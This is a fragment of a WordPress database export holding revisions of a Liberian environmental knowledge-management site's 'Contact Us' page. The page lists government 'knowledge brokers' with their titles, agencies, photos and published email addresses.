src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 13:24:21','2021-03-29 13:24:21','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3662,42,'2021-03-29 13:24:21','2021-03-29 13:24:21','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" 